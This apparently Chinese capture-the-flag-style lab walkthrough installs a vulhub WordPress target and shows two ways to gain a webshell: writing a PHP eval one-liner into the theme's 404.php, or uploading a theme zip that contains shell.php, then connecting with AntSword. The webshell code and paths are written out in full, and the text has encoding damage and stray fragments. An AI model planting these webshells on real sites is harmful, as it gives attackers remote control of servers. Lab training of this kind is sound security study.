1.進入靶場環境:
輸入:cd / vulhub / wordpress / pwnscriptum
修改版本號:? vim docker-compose.yml? ? ?version: '3'? ?保存退出
? 
開啟靶場環境: docker - compose up - d
開啟成功,docker ps查看端口? ?靶場環境8080端口映射到80端口
2. 瀏覽器訪問靶場ip+端口? ?
192.168.182.143:8080
選擇簡體中文,點擊“繼續”。
3.? 填入信息,進行安裝
安裝完成,進行登錄。
4.獲得webshell
4.1 姿勢一:后臺修改模板拿webshell
4.1.1? 修改模板內容
修改其WP的模板寫??句話??后?并訪問其?件即可GetShell;登陸WP后點擊 【外
觀】 --》 【編輯】 --》 404.php
4.1.2? 寫入一句話木馬
在其404模板中插??句話??代碼..點擊 【更新?件】 按鈕<? php eval ( $_POST [ cmd ]);?>
4.1.3 拼接路徑,訪問文件,蟻劍連接
#拼接路徑? ? ? ?/wp-content/themes/twentyfifteen/404.php訪問連接:? ?http://192.168.182.143:8080/wp-content/themes/twentyfifteen/404.php
?4.2 姿勢二:上傳主題拿WebShell
4.2.1寫入木馬文件,和正常的主題模板合并壓縮為1.zip文件
寫入一句話木馬,保存文件為shell.php。<?php @eval($_POST[cmd]);?>
在網址中任意下載一個免費的模板zip文件; wordpress免費主題|wordpress企業主題|wordpress cms主題|wordpress網站模板|wordpress模板-WEB主題公園
解壓后,將shell.php文件拖入解壓包,并再次壓縮為1.zip文件
4.2.2 上傳主題
點擊 【外 觀】 --》 【主題】 --》 【添加】 --》 【上傳主題】 --》 【瀏覽】 --》 【現在安裝】
4.2.3? 拼接路徑,訪問連接,蟻劍連接
#拼接路徑? ? ?/wp-content/themes/壓縮包解壓后文件名/木馬文件名.php
該壓縮包文件,再上傳上去后,會自動解壓,從而進行安裝主題。此次木馬php文件也在解壓后的文件里,即在網站根目錄且可以訪問。
訪問:http://192.168.182.143:8080/wp-content/themes/1/shell.php? ?【這里的1,指的是壓縮包解壓得到的文件的文件名】
練習結束,知道目標網站的CMS架構,搜索常見漏洞可進行嘗試。
修改原有php文件,寫入一句話木馬;
上傳包含木馬php文件的正常模板壓縮包,上傳完成后,會自動解壓安裝主題,因而木馬文件成功上傳到網站,訪問木馬文件,即可獲取webshell。
WordPress框架,這兩種方式通用。
希望對大家有所幫助,謝謝。
再見。。。
-----------2025/3/20? 20:25
,源碼可白嫖!)
)
